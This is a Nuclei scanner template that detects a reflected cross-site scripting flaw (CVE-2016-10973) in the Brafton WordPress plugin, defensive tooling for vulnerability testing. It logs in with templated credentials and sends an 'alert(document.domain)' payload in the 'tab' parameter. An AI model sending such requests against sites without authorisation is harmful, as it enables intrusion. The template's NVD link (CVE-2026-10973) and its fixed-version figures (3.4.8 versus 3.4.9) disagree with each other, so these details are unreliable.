nuclei-templates/http/cves/2016/CVE-2016-10973.yaml

53 lines
2.1 KiB
YAML

id: CVE-2016-10973
info:
name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting
author: Harsh
severity: medium
description: |
The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd
- https://nvd.nist.gov/vuln/detail/CVE-2026-10973
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-10973
cwe-id: CWE-79
epss-score: 0.00177
epss-percentile: 0.54147
cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: brafton
product: brafton
framework: wordpress
tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "tab = alert(document.domain);")'
- 'contains(body_2, "Brafton Article Loader")'
condition: and
# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950